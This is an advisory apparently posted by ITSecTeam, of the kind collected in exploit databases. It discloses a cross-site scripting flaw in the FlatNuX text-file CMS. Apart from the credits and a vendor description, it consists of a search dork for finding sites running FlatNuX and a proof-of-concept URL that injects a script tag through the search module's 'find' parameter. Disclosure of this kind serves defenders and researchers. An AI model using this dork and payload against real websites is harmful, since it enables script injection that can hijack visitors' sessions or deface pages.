############### #Title: FlatnuX 2010-06.09 XSS # #Vendor: http://www.flatnux.altervista.org/ # #Dork: "Powered by FlatNuX" # ############### #AUTHOR: ITSecTeam # #Email: Bug@ITSecTeam.com # #Website: http://www.itsecteam.com # #Forum : http://forum.ITSecTeam.com # #Original Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability55.htm #Thanks: r3dm0v3,M3hr@n.S ,Pejvak,am!rkh@n ############################################################################ #DESCRIPTION (by vendor):################################################### FlatNux is a CMS (Content Management System) that makes no use of DBMS, but only text files (so its name). #POC:############# http://www.flatnux.altervista.org/index.php?mod=none_Search&find="><script>alert(1)</script>